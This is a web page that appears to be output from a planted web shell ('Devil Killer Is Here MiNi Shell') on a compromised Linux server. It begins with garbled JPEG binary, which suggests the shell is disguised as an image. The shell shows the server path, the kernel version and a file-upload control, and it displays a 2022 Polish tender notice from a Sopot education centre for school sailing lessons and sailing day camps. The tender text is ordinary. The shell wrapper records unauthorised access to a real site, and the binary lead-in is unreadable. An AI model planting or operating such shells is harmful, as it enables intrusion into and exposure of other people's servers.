JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220419/0012549001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja i przeprowadzenie zajęć żeglarskich dla uczniów sopockich szkół podstawowych w ramach projektu &#34;Pomorskie żagle wiedzy - Sopot&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM KSZTAŁCENIA USTAWICZNEGO IM.BOHATERÓW WYBRZEŻA W SOPOCIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Małgorzata Kopacz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191896755</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 22-24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-704</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 551 00 11</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektoradmin@ckusopot.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ckusopot.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> szkoła publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja i przeprowadzenie zajęć żeglarskich dla uczniów sopockich szkół podstawowych w ramach projektu &#34;Pomorskie żagle wiedzy - Sopot&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3bae0745-bfb1-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00125490</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027503/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Organizacja i przeprowadzenie zajęć żeglarskich dla uczniów sopockich szkół podstawowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Pomorskie żagle wiedzy - Sopot </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3bae0745-bfb1-11ec-aa46-6a814e8de928 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/><br/>W uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: dyrektoradmin@ckusopot.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza)<br/><br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informację na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy” na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/><br/>	administratorem Pani/Pana danych osobowych jest: Centrum Kształcenia Ustawicznego, ul. Kościuszki 22-24, 81-704 Sopot, tel. 58 551 00 11;<br/>	inspektorem ochrony danych osobowych* w CKU jest Pani Sabina Tatol - Baczyńska , tel. 58 551 00 11 wew. 46, adres e-mail: rodo@ckusopot.pl ;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem nr sprawy CKU.MK.261.3.2020 <br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania <br/>	Pani/Pana dane osobowe będą przechowywane do momentu wymaganego przez przepisy Ustawy PZP i przepisy prawa w zakresie zasobów archiwalnych i archiwów.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CKU.MK.261.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cel zamówienia: Upowszechnianie aktywności wodnych wśród dzieci i młodzieży sopockich szkół podstawowych, zaszczepienie zamiłowania do morza i popularyzacja żeglarstwa. <br/><br/>Przedmiot zamówienia: przeprowadzenie zajęć żeglarskich dla uczniów klas II-VII sopockich szkół podstawowych zwanych dalej uczestnikami zajęć, w ramach projektu „Pomorskie żagle Wiedzy – Sopot”. <br/><br/>W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do:<br/><br/>1)	zorganizowania i przeprowadzenia zajęć żeglarskich w ilości 112 h zegarowych dla łącznie 40 uczniów wraz z zapewnieniem:<br/>- wykwalifikowanej kadry szkoleniowej - instruktorów żeglarstwa/trenerów żeglarstwa,<br/>- instruktażu z podstaw żeglowania,<br/>- sali dydaktycznej spełniającej wymogi w zakresie ochrony p.poż. i warunków higieniczno – sanitarnych do przeprowadzenia zajęć podczas złych warunków atmosferycznych,<br/>- sprawnych jednostek pływających o długości do 6 m, którym podstawowym czynnikiem napędowym jest jeden lub więcej żagli w ilości, która zapewni właściwą realizację przedmiotu zamówienia: łódek klasy Optymist dla młodszych uczniów oraz klasy O’pen Skiff i/lub katamaranów dla starszych uczniów, <br/>- kamizelek asekuracyjnych z atestami, pasów trapezowych,<br/>- motorówek do asekuracji (min. 2 szt.),<br/>- szatni i sanitariatów.<br/><br/>Razem: <br/>4 grupy x 2 h/tygodniowo x 14 tygodni = 112 h<br/>4 grupy x 10 osób = 40 osób<br/><br/>Zakres tematyczny instuktażu: budowa i obsługa jednostek pływających, wiązanie podstawowych węzłów, obsługa żagli, praca żaglami, taklowanie jednostki pływającej, działanie steru, miecza i kadłuba, meteorologia, podstawy etykiety żeglarskiej i obyczaje żeglarskie, zasady bezpieczeństwa na wodzie, unikanie kolizji, prawo drogi.<br/>Program zajęć na wodzie:<br/>- przygotowanie jednostek pływających do żeglowania,<br/>- odejście i dojście do brzegu, zatrzymanie się,<br/>- żeglowanie na wiatr, zmiana kursu i żeglowanie z wiatrem,<br/>- wykonywanie zwrotów na wiatr i z wiatrem przy słabym i silnym wietrze,<br/>- żeglowanie przy różnych warunkach wietrznych,<br/>- stawianie jednostek pływających po wywrotce,<br/>- żeglowanie na fali.<br/><br/>2)	zapewnienia (opłacenia) uczestnikom zajęć żeglarskich ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w czasie uczestnictwa w zajęciach oraz w drodze z i do miejsca zajęć,<br/>3)	zapewnienie usługi kompleksowego zabezpieczenia ratowniczego w trakcie trwania zajęć na wodzie, <br/>4)	wystawienia dyplomów o ukończeniu zajęć żeglarskich,<br/>5)	oznaczenia dokumentów związanych z realizacją przedmiotu zamówienia (np. listy obecności, ankiety), dokumenty, które podaje do wiadomości publicznej lub przeznacza dla uczestników projektu (np. materiały dydaktyczne, dyplomy ukończenia zajęć), <br/>6)	zapewnienia higienicznych i bezpiecznych warunków realizacji zajęć, przestrzegania obowiązujących wymogów sanitarnych w przypadku organizacji zajęć (m.in. zapewnienie przy wejściu do pomieszczenia i w środku pomieszczenia płynu do dezynfekcji rąk, zapewnienie dobrej wentylacji pomieszczenia - częste wietrzenie, zapewnienie odpowiednich odległości między stolikami itd.), stosowania wytycznych GIS, MZ w zakresie zapobiegania, przeciwdziałania i zwalczania Covid – 19.<br/><br/>Miejsce i sposób realizacji zamówienia:<br/>Zajęcia w ilości 2 godzin/tydzień mają być przeprowadzone w ramach zajęć pozalekcyjnych uczniów w dniach poniedziałek – piątek w godz. 13.00 – 18.00 lub w sobotę w godzinach przedpołudniowych. <br/>Zajęcia będą sie odbywały przez okres 14 tygodni w miesiącach maj 2022 r. do czerwiec 2022 r. <br/>oraz wrzesień 2022 r. – październik 2022 r. dla uczniów (4 grupy x 10 osób) <br/><br/>Wskazany w opisie przedmiotu zamówienia czas zajęć praktycznych na wodzie nie obejmuje czasu przygotowania się uczniów do zajęć (przebrania się przed i po zajęciach). <br/>Wykonawca będzie zobowiązany przygotować program zajęć żeglarskich, który będzie dostosowany do wieku, potrzeb, sprawności fizycznej, umiejętności uczniów i przedstawi go do akceptacji Zamawiającego przed podpisaniem umowy. <br/>Wykonawca będzie zobowiązany podać Zamawiającemu propozycje terminów zajęć w wymaganym okresie realizacji zamówienia. Zamawiający zastrzega sobie możliwość wyboru dowolnego terminu zajęć spośród terminów zaproponowanych przez Wykonawcę. <br/><br/>Miejsce realizacji zajęć: na terenie miasta Sopotu<br/>Termin wykonania zamówienia:<br/>Zamawiający wymaga realizacji całości zamówienia w terminie 6 miesięcy od dnia zawarcia umowy jednak nie wcześniej niż od dnia 10.05.2022 r. i nie później niż do dnia 31.10.2022 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80413000-2 - Usługi szkół nauki żeglowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1) <br/>w związku z art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>Zamówienia polegające na powtórzeniu podobnych usług zostaną udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel. <br/>Zamówienie zostanie udzielone w trybie zamówienia z wolnej ręki – art. 305 uPzp. <br/>Powyższe zamówienia mogą zostać udzielone o ile Wykonawca spełni przynajmniej następujące warunki: Wykonawca dotychczas realizował usługi w terminie i z najwyższą starannością; zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego; Wykonawca zaakceptuje istotne warunki dotychczasowej umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części 1 zamówienia:<br/>a) cena brutto oferty – 60%<br/>b) doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich – 20% <br/>c) doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich – 20% <br/><br/>Opis zastosowanych kryteriów:<br/>a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: <br/>	<br/>&#34;Pkc = &#34; (&#34;Cn × &#34; &#34;W&#34; _&#34;1&#34; &#34; × 100&#34; )/&#34;Cb&#34; <br/>gdzie:<br/>Pkc - ilość punktów dla kryterium cena <br/>Cn - najniższa cena brutto, <br/>W1 – wskaźnik 0,60<br/>Cb - cena brutto badanej oferty<br/><br/>b) w ramach kryterium – doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa z możliwością uzyskania maksymalnie 20 punktów <br/>Zamawiający przyzna punkty w sposób następujący:<br/><br/>Ocenie podlegać będzie doświadczenie instruktora żeglarstwa/trenera żeglarstwa nabyte w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie, wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu.<br/><br/>Doświadczenie instruktora żeglarstwa/trenera żeglarstwa ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu – waga 20%<br/><br/>przeprowadzenie 3 usług (warunek udziału w postępowaniu) – 0 pkt.<br/>przeprowadzenie od 1 do 2 usług ponad wskazane na potwierdzenie warunków udziału – 10 pkt. <br/>przeprowadzenie od 3 do 4 usług ponad wskazane na potwierdzenie warunków udziału – 15 pkt.<br/>przeprowadzenie powyżej 4 usług ponad wskazane na potwierdzenie warunków udziału – 20 pkt.<br/><br/>Zamawiający oceniał będzie doświadczenie na podstawie wykazu zrealizowanych usług (ponad wymagane na potwierdzenie warunku udziału) zawartego w interaktywnym formularzu oferty (załącznik nr 1 do SWZ). <br/>UWAGA :<br/>Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 5 SWZ. <br/>Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.<br/><br/>c) w ramach kryterium – doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa z możliwością uzyskania maksymalnie 20 punktów <br/>Zamawiający przyzna punkty w sposób opisany w punkcie b) <br/><br/>Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: <br/> P = Pkc + Pkd1 + PKd2 <br/>gdzie:<br/>P – łączna ilość punktów dla wszystkich kryteriów <br/>Pkc – Ilość punktów dla kryterium cena brutto oferty<br/>Pkd1 – ilość punktów dla kryterium doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa <br/>Pkd2 – ilość punktów dla kryterium doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa <br/><br/>Zamawiający udzieli zamówienie Wykonawcy którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszej swz.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cel zamówienia: Upowszechnianie aktywności wodnych wśród dzieci i młodzieży sopockich szkół podstawowych, zaszczepienie zamiłowania do morza i popularyzacja żeglarstwa. <br/> <br/>Przedmiot zamówienia: zorganizowanie i przeprowadzenie półkolonii żeglarskich dla uczniów klas II-VII sopockich szkół podstawowych w ramach projektu „Pomorskie żagle Wiedzy – Sopot”. <br/><br/>W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do:<br/>1)	zorganizowania i przeprowadzenie półkolonii żeglarskich pod hasłem „Lato na wodzie” w ilości 6 turnusów trwających po 5 dni, obejmujących praktyczne zajęcia żeglarskie oraz zajęcia sportowo – rekreacyjne (na lądzie) dla łącznie 60 uczniów wraz z zapewnieniem:<br/>	kierownika wypoczynku, wykwalifikowanych wychowawców wypoczynku, instruktorów żeglarstwa/trenerów żeglarstwa, <br/>	pomieszczenia spełniającego wymogi w zakresie ochrony p.poż. i warunków higieniczno – sanitarnych, do przeprowadzenia zajęć podczas złych warunków atmosferycznych,<br/>	sprawnych jednostek pływających o długości do 6 m, którym podstawowym czynnikiem napędowym jest jeden lub więcej żagli w ilości, która zapewni właściwą realizację przedmiotu zamówienia, umożliwi prowadzenie zajęć żeglarskich na wodzie łącznie 10 uczniom/turnus. <br/>	kamizelek 